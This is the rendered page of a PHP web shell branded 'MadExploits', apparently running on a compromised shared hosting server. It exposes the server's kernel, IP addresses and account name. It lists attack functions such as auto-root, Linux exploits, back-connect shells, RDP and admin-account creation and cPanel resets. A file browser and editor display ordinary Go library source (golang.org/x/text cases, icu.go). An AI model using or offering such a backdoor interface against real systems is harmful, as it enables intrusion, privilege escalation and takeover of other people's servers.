Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
go /
pkg /
mod /
golang.org /
x /
text@v0.14.0 /
cases /
[ HOME SHELL ]
Name
Size
Permission
Action
cases.go
4.87
KB
-r--r--r--
context.go
9.47
KB
-r--r--r--
context_test.go
11.08
KB
-r--r--r--
example_test.go
933
B
-r--r--r--
fold.go
935
B
-r--r--r--
fold_test.go
1.32
KB
-r--r--r--
gen.go
21.35
KB
-r--r--r--
gen_trieval.go
6.37
KB
-r--r--r--
icu.go
1.41
KB
-r--r--r--
icu_test.go
6.57
KB
-r--r--r--
info.go
2.93
KB
-r--r--r--
map.go
22.73
KB
-r--r--r--
map_test.go
30
KB
-r--r--r--
tables10.0.0.go
93.94
KB
-r--r--r--
tables10.0.0_test.go
25.4
KB
-r--r--r--
tables11.0.0.go
97.48
KB
-r--r--r--
tables11.0.0_test.go
25.87
KB
-r--r--r--
tables12.0.0.go
99.17
KB
-r--r--r--
tables12.0.0_test.go
26.11
KB
-r--r--r--
tables13.0.0.go
100.73
KB
-r--r--r--
tables13.0.0_test.go
26.39
KB
-r--r--r--
tables15.0.0.go
106.48
KB
-r--r--r--
tables15.0.0_test.go
27.02
KB
-r--r--r--
tables9.0.0.go
92.38
KB
-r--r--r--
tables9.0.0_test.go
25.28
KB
-r--r--r--
trieval.go
6.27
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : icu.go
// Copyright 2016 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. //go:build icu package cases // Ideally these functions would be defined in a test file, but go test doesn't // allow CGO in tests. The build tag should ensure either way that these // functions will not end up in the package. // TODO: Ensure that the correct ICU version is set. /* #cgo LDFLAGS: -licui18n.57 -licuuc.57 #include <stdlib.h> #include <unicode/ustring.h> #include <unicode/utypes.h> #include <unicode/localpointer.h> #include <unicode/ucasemap.h> */ import "C" import "unsafe" func doICU(tag, caser, input string) string { err := C.UErrorCode(0) loc := C.CString(tag) cm := C.ucasemap_open(loc, C.uint32_t(0), &err) buf := make([]byte, len(input)*4) dst := (*C.char)(unsafe.Pointer(&buf[0])) src := C.CString(input) cn := C.int32_t(0) switch caser { case "fold": cn = C.ucasemap_utf8FoldCase(cm, dst, C.int32_t(len(buf)), src, C.int32_t(len(input)), &err) case "lower": cn = C.ucasemap_utf8ToLower(cm, dst, C.int32_t(len(buf)), src, C.int32_t(len(input)), &err) case "upper": cn = C.ucasemap_utf8ToUpper(cm, dst, C.int32_t(len(buf)), src, C.int32_t(len(input)), &err) case "title": cn = C.ucasemap_utf8ToTitle(cm, dst, C.int32_t(len(buf)), src, C.int32_t(len(input)), &err) } return string(buf[:cn]) }
Close